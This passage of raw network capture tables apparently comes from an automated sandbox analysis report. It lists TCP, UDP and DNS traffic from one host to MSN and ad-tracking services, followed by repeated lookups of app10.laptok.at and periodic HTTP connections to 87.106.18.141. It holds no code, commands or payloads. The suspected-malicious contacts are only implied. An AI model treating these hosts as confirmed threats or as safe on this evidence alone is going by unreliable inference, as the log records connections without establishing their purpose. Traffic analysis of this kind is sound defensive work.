Oct 7, 2021 15:51:55.449857950 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.449872971 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.449942112 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.449979067 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.450036049 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.450043917 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.450094938 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.450097084 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.450150013 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.451198101 CEST	49850	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.451219082 CEST	443	49850	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504021883 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504072905 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504102945 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504128933 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504189014 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.504213095 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.504249096 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.504326105 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.506325960 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506393909 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506424904 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506450891 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506480932 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506500959 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.506525040 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506545067 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.506552935 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.506592989 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.506635904 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.512706041 CEST	49852	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.512756109 CEST	443	49852	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.569773912 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.569938898 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.569963932 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.570053101 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573272943 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573388100 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573436975 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573481083 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573523998 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573566914 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573616982 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573899984 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573924065 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573940039 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573945045 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573949099 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573954105 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573960066 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573965073 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.573967934 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.573971033 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.574017048 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.574029922 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.574089050 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.574095964 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.574145079 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.575666904 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.575733900 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.575747967 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.575762987 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.575875044 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:51:55.575901985 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.575917959 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.575937033 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.576395988 CEST	49848	443	192.168.2.4	151.101.1.44
Oct 7, 2021 15:51:55.576421022 CEST	443	49848	151.101.1.44	192.168.2.4
Oct 7, 2021 15:52:01.848321915 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:52:01.848462105 CEST	443	49775	104.20.184.68	192.168.2.4
Oct 7, 2021 15:52:01.848494053 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:52:01.848532915 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:52:04.208547115 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:52:04.208619118 CEST	443	49791	104.26.7.139	192.168.2.4
Oct 7, 2021 15:52:04.208708048 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:52:04.208720922 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:52:06.890449047 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:52:06.890580893 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:52:06.890590906 CEST	443	49807	172.67.69.19	192.168.2.4
Oct 7, 2021 15:52:06.890642881 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:52:53.392574072 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:52:53.394088030 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:52:53.394155025 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:52:53.394181967 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:53:08.212390900 CEST	49937	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.212449074 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.232711077 CEST	80	49937	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.232845068 CEST	49937	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.235357046 CEST	80	49936	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.235537052 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.238802910 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.261037111 CEST	80	49936	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.308232069 CEST	80	49936	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.308456898 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.582734108 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:08.607753992 CEST	80	49936	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.630127907 CEST	80	49936	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:08.630245924 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:09.558274031 CEST	49936	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:09.558389902 CEST	49937	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:28.919490099 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:53:28.919518948 CEST	49814	443	192.168.2.4	35.244.174.68
Oct 7, 2021 15:53:28.919905901 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:53:28.919922113 CEST	443	49829	18.156.81.187	192.168.2.4
Oct 7, 2021 15:53:28.919929028 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:53:28.919975996 CEST	49829	443	192.168.2.4	18.156.81.187
Oct 7, 2021 15:53:28.920121908 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:53:28.920142889 CEST	49807	443	192.168.2.4	172.67.69.19
Oct 7, 2021 15:53:28.920375109 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:53:28.920418024 CEST	49805	443	192.168.2.4	172.217.168.38
Oct 7, 2021 15:53:28.921010017 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:53:28.921032906 CEST	49791	443	192.168.2.4	104.26.7.139
Oct 7, 2021 15:53:28.921425104 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:53:28.921437025 CEST	49775	443	192.168.2.4	104.20.184.68
Oct 7, 2021 15:53:29.547756910 CEST	49962	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.547842979 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.573374033 CEST	80	49962	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:29.573398113 CEST	80	49961	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:29.574697971 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.577492952 CEST	49962	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.599540949 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.623281002 CEST	80	49961	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:29.647164106 CEST	80	49961	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:29.654371023 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.942718029 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:29.992330074 CEST	80	49961	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:29.992466927 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:30.907269001 CEST	49962	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:30.907407045 CEST	49961	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.539855957 CEST	49965	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.539885998 CEST	49966	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.563472033 CEST	80	49965	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:34.563509941 CEST	80	49966	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:34.563623905 CEST	49965	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.563957930 CEST	49966	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.574084044 CEST	49965	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:34.596146107 CEST	80	49965	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:34.620594978 CEST	80	49965	87.106.18.141	192.168.2.4
Oct 7, 2021 15:53:34.620908022 CEST	49965	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:35.870177031 CEST	49965	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:53:35.870291948 CEST	49966	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.158863068 CEST	49998	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.160279036 CEST	49997	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.181035042 CEST	80	49997	87.106.18.141	192.168.2.4
Oct 7, 2021 15:54:06.182341099 CEST	49997	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.183676004 CEST	49997	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.185153961 CEST	80	49998	87.106.18.141	192.168.2.4
Oct 7, 2021 15:54:06.186655998 CEST	49998	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:06.208997965 CEST	80	49997	87.106.18.141	192.168.2.4
Oct 7, 2021 15:54:06.239257097 CEST	80	49997	87.106.18.141	192.168.2.4
Oct 7, 2021 15:54:06.239341974 CEST	49997	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:07.357055902 CEST	49998	80	192.168.2.4	87.106.18.141
Oct 7, 2021 15:54:07.357180119 CEST	49997	80	192.168.2.4	87.106.18.141

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 15:51:42.153971910 CEST	54531	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:45.878279924 CEST	53097	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:46.787461042 CEST	49257	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:46.807949066 CEST	53	49257	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:46.959943056 CEST	62389	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:46.979758024 CEST	53	62389	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:48.617886066 CEST	49910	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:48.638217926 CEST	53	49910	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:51.565850973 CEST	55854	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:51.584574938 CEST	53	55854	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:51.816333055 CEST	64549	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:51.822688103 CEST	63153	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:51.842592955 CEST	53	64549	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:51.842875957 CEST	53	63153	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.451631069 CEST	52991	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.478718042 CEST	53	52991	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.507438898 CEST	53700	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.526272058 CEST	53	53700	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.651334047 CEST	51726	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.671545982 CEST	53	51726	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.770416975 CEST	56794	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.778383970 CEST	56534	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.790225029 CEST	53	56794	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.797425032 CEST	53	56534	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:52.960918903 CEST	56627	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:52.976741076 CEST	53	56627	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:53.001507998 CEST	56621	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:53.020817041 CEST	53	56621	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:53.687244892 CEST	63116	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:53.705178976 CEST	53	63116	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:53.890007019 CEST	64078	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:53.907949924 CEST	53	64078	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:53.953255892 CEST	64801	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:55.138381958 CEST	61721	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:51:55.156249046 CEST	53	61721	8.8.8.8	192.168.2.4
Oct 7, 2021 15:51:56.737637997 CEST	51255	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:53:08.155821085 CEST	49285	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:53:08.193269968 CEST	53	49285	8.8.8.8	192.168.2.4
Oct 7, 2021 15:53:29.472192049 CEST	56448	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:53:29.505728006 CEST	53	56448	8.8.8.8	192.168.2.4
Oct 7, 2021 15:53:34.481219053 CEST	59172	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:53:34.497850895 CEST	53	59172	8.8.8.8	192.168.2.4
Oct 7, 2021 15:54:06.077280045 CEST	50904	53	192.168.2.4	8.8.8.8
Oct 7, 2021 15:54:06.095714092 CEST	53	50904	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 15:51:42.153971910 CEST	192.168.2.4	8.8.8.8	0x3d2e	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:45.878279924 CEST	192.168.2.4	8.8.8.8	0x6bbf	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:46.787461042 CEST	192.168.2.4	8.8.8.8	0x19e7	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:46.959943056 CEST	192.168.2.4	8.8.8.8	0xd505	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:48.617886066 CEST	192.168.2.4	8.8.8.8	0x44fe	Standard query (0)	btloader.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.565850973 CEST	192.168.2.4	8.8.8.8	0x8482	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.816333055 CEST	192.168.2.4	8.8.8.8	0x57b	Standard query (0)	ad.doubleclick.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.822688103 CEST	192.168.2.4	8.8.8.8	0x2a71	Standard query (0)	ad-delivery.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.451631069 CEST	192.168.2.4	8.8.8.8	0xe592	Standard query (0)	cm.g.doubleclick.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.507438898 CEST	192.168.2.4	8.8.8.8	0x61a7	Standard query (0)	x.bidswitch.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.651334047 CEST	192.168.2.4	8.8.8.8	0x7224	Standard query (0)	id.rlcdn.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.770416975 CEST	192.168.2.4	8.8.8.8	0xfc26	Standard query (0)	cs.media.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.778383970 CEST	192.168.2.4	8.8.8.8	0xf784	Standard query (0)	match.adsrvr.org	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.960918903 CEST	192.168.2.4	8.8.8.8	0x9c9f	Standard query (0)	rtb.mfadsrvr.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.001507998 CEST	192.168.2.4	8.8.8.8	0x2c46	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.687244892 CEST	192.168.2.4	8.8.8.8	0xfe40	Standard query (0)	pixel.advertising.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.890007019 CEST	192.168.2.4	8.8.8.8	0x4039	Standard query (0)	ups.analytics.yahoo.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.953255892 CEST	192.168.2.4	8.8.8.8	0x9dc8	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:55.138381958 CEST	192.168.2.4	8.8.8.8	0x6323	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:56.737637997 CEST	192.168.2.4	8.8.8.8	0xc1ae	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:08.155821085 CEST	192.168.2.4	8.8.8.8	0x7941	Standard query (0)	app10.laptok.at	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:29.472192049 CEST	192.168.2.4	8.8.8.8	0x41f5	Standard query (0)	app10.laptok.at	A (IP address)	IN (0x0001)
Oct 7, 2021 15:53:34.481219053 CEST	192.168.2.4	8.8.8.8	0xb573	Standard query (0)	app10.laptok.at	A (IP address)	IN (0x0001)
Oct 7, 2021 15:54:06.077280045 CEST	192.168.2.4	8.8.8.8	0xec88	Standard query (0)	app10.laptok.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 15:51:42.171761036 CEST	8.8.8.8	192.168.2.4	0x3d2e	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:45.913817883 CEST	8.8.8.8	192.168.2.4	0x6bbf	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:46.807949066 CEST	8.8.8.8	192.168.2.4	0x19e7	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:46.807949066 CEST	8.8.8.8	192.168.2.4	0x19e7	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:46.979758024 CEST	8.8.8.8	192.168.2.4	0xd505	No error (0)	contextual.media.net		95.100.216.34	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:48.638217926 CEST	8.8.8.8	192.168.2.4	0x44fe	No error (0)	btloader.com		104.26.7.139	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:48.638217926 CEST	8.8.8.8	192.168.2.4	0x44fe	No error (0)	btloader.com		172.67.70.134	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:48.638217926 CEST	8.8.8.8	192.168.2.4	0x44fe	No error (0)	btloader.com		104.26.6.139	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.584574938 CEST	8.8.8.8	192.168.2.4	0x8482	No error (0)	lg3.media.net		95.100.216.34	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.842592955 CEST	8.8.8.8	192.168.2.4	0x57b	No error (0)	ad.doubleclick.net	dart.l.doubleclick.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:51.842592955 CEST	8.8.8.8	192.168.2.4	0x57b	No error (0)	dart.l.doubleclick.net		172.217.168.38	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.842875957 CEST	8.8.8.8	192.168.2.4	0x2a71	No error (0)	ad-delivery.net		172.67.69.19	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.842875957 CEST	8.8.8.8	192.168.2.4	0x2a71	No error (0)	ad-delivery.net		104.26.3.70	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:51.842875957 CEST	8.8.8.8	192.168.2.4	0x2a71	No error (0)	ad-delivery.net		104.26.2.70	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.478718042 CEST	8.8.8.8	192.168.2.4	0xe592	No error (0)	cm.g.doubleclick.net		142.250.203.98	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	x.bidswitch.net	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		18.156.81.187	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		18.192.203.176	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		3.123.82.137	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		3.120.56.129	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		18.196.176.125	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		18.185.142.87	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		18.195.106.43	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.526272058 CEST	8.8.8.8	192.168.2.4	0x61a7	No error (0)	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com		3.126.38.41	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.671545982 CEST	8.8.8.8	192.168.2.4	0x7224	No error (0)	id.rlcdn.com		35.244.174.68	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.790225029 CEST	8.8.8.8	192.168.2.4	0xfc26	No error (0)	cs.media.net		95.100.216.34	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.797425032 CEST	8.8.8.8	192.168.2.4	0xf784	No error (0)	match.adsrvr.org	a97adde81b00f2ca4.awsglobalaccelerator.com		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:52.797425032 CEST	8.8.8.8	192.168.2.4	0xf784	No error (0)	a97adde81b00f2ca4.awsglobalaccelerator.com		76.223.111.131	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.797425032 CEST	8.8.8.8	192.168.2.4	0xf784	No error (0)	a97adde81b00f2ca4.awsglobalaccelerator.com		13.248.242.197	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	rtb.mfadsrvr.com	pool.dorpat.iponweb.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	pool.dorpat.iponweb.net	dorpat.geo.iponweb.net		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	dorpat.geo.iponweb.net	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.195.217.206	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.195.180.91	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.194.128.57	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.195.183.48	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.195.129.227	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.196.123.190	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:52.976741076 CEST	8.8.8.8	192.168.2.4	0x9c9f	No error (0)	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com		18.194.18.201	A (IP address)	IN (0x0001)
Oct 7, 2021 15:51:53.020817041 CEST	8.8.8.8	192.168.2.4	0x2c46	No error (0)	hblg.media.net		95.100.216.34	A (IP address)	IN (0x0001)
